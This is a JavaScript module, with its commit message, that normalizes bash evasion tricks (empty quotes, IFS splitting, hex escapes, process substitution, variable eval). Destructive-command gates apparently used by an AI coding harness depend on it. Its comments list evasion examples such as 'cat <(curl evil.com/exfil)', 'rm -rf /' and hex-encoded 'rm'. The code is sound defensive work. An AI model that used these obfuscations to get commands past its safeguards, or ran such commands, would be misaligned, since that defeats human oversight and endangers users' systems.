Strips bash process substitution syntax — <(cmd) and >(cmd) — so the inner command name is surfaced to downstream regex gates. Defeats evasion like `cat <(curl evil)` where the destructive command is hidden behind /dev/fd/N pipe sugar. Implementation: bounded innermost-first iteration, depth 3. Beyond that the string is left as-is rather than recurse without bound. Runs after the single-quote mask phase, so legitimate strings like `'echo <(x)'` are preserved. 5 new T7 tests (collapse + nested + FP probes) in bash-normalize-t7-t9.test.mjs (now 12 tests total). Closes E8 in critical-review-2026-04-20.md.
202 lines
8 KiB
JavaScript
202 lines
8 KiB
JavaScript
// bash-normalize.mjs — Normalize bash parameter expansion evasion techniques.
|
|
//
|
|
// Attackers can evade command-name matching by inserting shell metacharacters
|
|
// that are transparent to bash but break regex patterns.
|
|
//
|
|
// This module strips these constructs from command names so that downstream
|
|
// pattern matching sees the canonical form.
|
|
//
|
|
// Exported as a shared module — used by pre-bash-destructive.mjs and
|
|
// pre-install-supply-chain.mjs.
|
|
//
|
|
// Pipeline (defense-in-depth layer above Claude Code 2.1.98+ harness fixes):
|
|
// T1 — empty single quotes: w''get -> wget
|
|
// T2 — empty double quotes: r""m -> rm
|
|
// T3 — parameter expansion: ${x} / ${FOO} -> x / ''
|
|
// T4 — backslash-between-words: c\u\r\l -> curl
|
|
// T5 — IFS word-splitting: rm${IFS}-rf${IFS}/ -> rm -rf /
|
|
// T6 — ANSI-C hex quoting: $'\x72\x6d' -rf / -> rm -rf /
|
|
// T7 — process substitution: cat <(curl evil) -> cat curl evil
|
|
// T9 — eval-via-variable: X=rm; ... $X -> X=rm; ... rm
|
|
// (one-level forward-flow; T8 base64-pipe-shell lives in
|
|
// pre-bash-destructive as a BLOCK_RULE, not a normalization)
|
|
//
|
|
// Execution order:
|
|
// 1. Strip empty single-quote pairs (T1) so c''u''rl -> curl before masking.
|
|
// 2. Decode ANSI-C hex inside $'...' (T6) before masking.
|
|
// 3. Mask remaining non-empty single-quoted regions. T3's ${...} sweep and
|
|
// other transforms cannot rewrite their content, preserving literals
|
|
// (false-positive probe: `echo '${IFS}'` stays untouched).
|
|
//   4. Run T7 (process substitution), T5 (IFS), T9 (eval-via-variable), then T2/T3/T4 on the masked string.
|
|
// 5. Unmask.
|
|
|
|
// Sentinel character that delimits placeholder indices: maskSingleQuoted emits
// `${MASK}<index>${MASK}` tokens and unmaskSingleQuoted matches the same shape
// to restore the original single-quoted text.
const MASK = '\x00';
|
|
|
|
/**
 * T6 — Decode ANSI-C numeric escapes inside `$'...'` contexts.
 *
 * Bash expands $'\x72\x6d', $'\162\155' and $'\u0072\u006d' to the same two
 * characters (r, m), so every numeric form has to be decoded or the command
 * name stays hidden from downstream matchers. Handled escapes:
 *   - \xH / \xHH      hexadecimal, one or two digits
 *   - \N / \NN / \NNN octal, one to three digits (value truncated to 8 bits)
 *   - \uH..HHHH       Unicode code point, one to four hex digits
 *   - \UH..HHHHHHHH   Unicode code point, one to eight hex digits
 *
 * The `$'...'` wrapper itself is replaced by the decoded content. Named
 * escapes (\n, \t, ...) and plain '...' strings are left untouched.
 *
 * @param {string} cmd - Command string to scan.
 * @returns {string} Command with numeric escapes inside `$'...'` decoded.
 */
function decodeAnsiCHex(cmd) {
  const NUMERIC_ESCAPE_RE =
    /\\(?:x([0-9a-fA-F]{1,2})|([0-7]{1,3})|u([0-9a-fA-F]{1,4})|U([0-9a-fA-F]{1,8}))/g;

  const decodeEscape = (escape, hex, octal, unicode4, unicode8) => {
    const codePoint =
      octal !== undefined
        ? Number.parseInt(octal, 8) & 0xff
        : Number.parseInt(hex || unicode4 || unicode8, 16);
    // Drop NUL: bash words cannot carry a NUL byte, and emitting one here
    // would collide with the \x00 sentinel used by the single-quote masker.
    if (codePoint === 0) return '';
    // Not a valid Unicode code point — keep the escape text rather than throw.
    if (codePoint > 0x10ffff) return escape;
    return String.fromCodePoint(codePoint);
  };

  return cmd.replace(/\$'([^']*)'/g, (_, content) =>
    content.replace(NUMERIC_ESCAPE_RE, decodeEscape),
  );
}
|
|
|
|
/**
 * T7 — Rewrite process substitution so the wrapped command is visible:
 * `<(cmd)` and `>(cmd)` each become ` cmd ` (inner text padded with spaces).
 *
 * Process substitution hands a command's output/input to another command
 * through a /dev/fd/N path, which hides the inner command name from
 * name-matching gates, e.g. `cat <(curl evil.com/exfil)`.
 *
 * Each pass only rewrites substitutions whose body contains no parentheses,
 * so nested forms unwrap from the inside out. At most three passes run; any
 * deeper nesting is left in place instead of looping without bound.
 *
 * @param {string} cmd - Command string (single-quoted regions already masked).
 * @returns {string} Command with up to three nesting levels collapsed.
 */
function collapseProcessSubstitution(cmd) {
  const MAX_PASSES = 3;
  const innermost = /[<>]\(([^()]*)\)/g;

  let current = cmd;
  let passes = 0;
  while (passes < MAX_PASSES) {
    const next = current.replace(innermost, (_match, body) => ` ${body} `);
    // Fixed point reached: nothing left to unwrap.
    if (next === current) return current;
    current = next;
    passes += 1;
  }
  return current;
}
|
|
|
|
/**
 * T9 — Inline simple variable assignments into their `${VAR}` / `$VAR`
 * references, defeating split-and-eval evasion such as `X=rm; eval "$X" -rf /`.
 *
 * How it works:
 *   - Assignments are only recognised at the start of the string or right
 *     after `;`, `&` or `|` (optionally followed by whitespace).
 *   - The captured value runs up to the next whitespace, `;`, `&` or `|`, so
 *     quoted multi-word values are not parsed.
 *   - When a name is assigned more than once, the first value wins.
 *   - Every reference in the string is rewritten, including ones that appear
 *     before the assignment; substitution is not scoped to `eval`.
 *   - Values are inserted once and never re-scanned as assignments, so
 *     chained variables (X=Y; Y=rm) are not followed.
 *
 * @param {string} cmd - Command string to scan.
 * @returns {string} Command with known variable references replaced by their
 *   literal values; the input itself when no assignment is found.
 */
function decodeEvalViaVariable(cmd) {
  const assignmentPattern = /(?:^|[;&|])\s*([A-Za-z_]\w*)=([^\s;&|]+)/g;
  const firstValues = new Map();

  for (
    let hit = assignmentPattern.exec(cmd);
    hit !== null;
    hit = assignmentPattern.exec(cmd)
  ) {
    const [, varName, varValue] = hit;
    if (firstValues.has(varName)) continue;
    firstValues.set(varName, varValue);
  }

  if (firstValues.size === 0) return cmd;

  let expanded = cmd;
  firstValues.forEach((literal, varName) => {
    // Function replacer keeps `$` sequences in the value literal.
    const emitLiteral = () => literal;
    // Braced references first, then bare ones — the bare pass also sees text
    // produced by the braced pass, so the order must not change.
    expanded = expanded
      .replace(new RegExp(`\\$\\{${varName}\\}`, 'g'), emitLiteral)
      .replace(new RegExp(`\\$${varName}\\b`, 'g'), emitLiteral);
  });
  return expanded;
}
|
|
|
|
/**
 * Swap every non-empty single-quoted region for an indexed placeholder token
 * of the form MASK + index + MASK, so later rewrites cannot touch the quoted
 * text. Empty `''` pairs never match the pattern and are left as they are.
 *
 * @param {string} cmd - Command string to mask.
 * @returns {{ masked: string, placeholders: string[] }} The masked string and
 *   the original quoted regions (quotes included), indexed by token number.
 */
function maskSingleQuoted(cmd) {
  const placeholders = [];
  const stash = (quoted) => {
    // push() returns the new length, so the slot just filled is length - 1.
    const slot = placeholders.push(quoted) - 1;
    return `${MASK}${slot}${MASK}`;
  };
  const masked = cmd.replace(/'[^']+'/g, stash);
  return { masked, placeholders };
}
|
|
|
|
/**
 * Restore the single-quoted regions that maskSingleQuoted replaced with
 * MASK + index + MASK tokens.
 *
 * A token whose index has no entry in `placeholders` is left untouched.
 * Such tokens can only come from NUL characters that were already present in
 * the input; substituting them would splice the literal text "undefined"
 * into the command.
 *
 * @param {string} str - Masked command string.
 * @param {string[]} placeholders - Original quoted regions, indexed by token
 *   number.
 * @returns {string} The string with every known token replaced by its
 *   original text.
 */
function unmaskSingleQuoted(str, placeholders) {
  const tokenPattern = new RegExp(`${MASK}(\\d+)${MASK}`, 'g');
  return str.replace(tokenPattern, (token, idx) => {
    const original = placeholders[Number.parseInt(idx, 10)];
    return typeof original === 'string' ? original : token;
  });
}
|
|
|
|
/**
 * Canonicalise a bash command string so that quoting / expansion tricks no
 * longer hide command names from downstream pattern matching.
 *
 * Stages, in execution order:
 *   1. T1  drop empty single-quote pairs           w''get            -> wget
 *   2. T6  decode `$'...'` escapes (decodeAnsiCHex)
 *   3.     mask non-empty single-quoted regions so the stages below cannot
 *          rewrite their content (`echo '${IFS}'` stays untouched)
 *   4. T7  collapse process substitution           <(cmd) / >(cmd)   -> ' cmd '
 *   5. T5  IFS word splitting                      ${IFS:0:1}, ${IFS}, $IFS -> ' '
 *   6. T9  inline VAR=value assignments into ${VAR} / $VAR references
 *   7. T2  drop empty double-quote pairs           r""m              -> rm
 *      T3  single-char ${x} -> x; any other ${...} -> '' (unknown value)
 *          drop backtick pairs holding only whitespace
 *   8. T4  drop a backslash sitting between two word characters, repeated
 *          until the string stops changing        c\u\r\l           -> curl
 *   9.     restore the masked single-quoted regions
 *
 * Left alone:
 *   - quotes around arguments (only empty pairs are removed)
 *   - bare $VAR, unless it is $IFS or a variable whose assignment T9 found
 *     in the same string
 *   - backslashes that are not between two word characters
 *   - content of non-empty single-quoted regions
 *
 * @param {string} cmd - Raw command string
 * @returns {string} Normalized command string. Falsy input yields ''; a
 *   truthy non-string argument is returned unchanged.
 */
export function normalizeBashExpansion(cmd) {
  if (typeof cmd !== 'string') return cmd || '';
  if (cmd === '') return '';

  // Apply [pattern, replacement] rules one after another, left to right.
  const rewrite = (text, rules) =>
    rules.reduce((acc, [pattern, replacement]) => acc.replace(pattern, replacement), text);

  // T1 then T6 — both must happen before masking, otherwise c''u''rl and
  // $'...' would be treated as quoted literals.
  const unquoted = decodeAnsiCHex(cmd.replace(/''/g, ''));
  const { masked, placeholders } = maskSingleQuoted(unquoted);

  // T7 then T5 — the spaces emitted here feed the later transforms.
  const ifsExpanded = rewrite(collapseProcessSubstitution(masked), [
    [/\$\{IFS:0:1\}/g, ' '],
    [/\$\{IFS\}/g, ' '],
    [/\$IFS\b/g, ' '],
  ]);

  // T9 has to run before T3, which blanks every unknown ${VAR}.
  let working = rewrite(decodeEvalViaVariable(ifsExpanded), [
    [/""/g, ''], // T2
    [/\$\{(\w)\}/g, '$1'], // T3 single-char
    [/\$\{[^}]*\}/g, ''], // T3 everything else
    [/`\s*`/g, ''], // empty backtick subshell
  ]);

  // T4 — one pass cannot strip adjacent escapes (c\u\r\l), so iterate to a
  // fixed point.
  for (;;) {
    const next = working.replace(/(\w)\\(\w)/g, '$1$2');
    if (next === working) break;
    working = next;
  }

  return unmaskSingleQuoted(working, placeholders);
}
|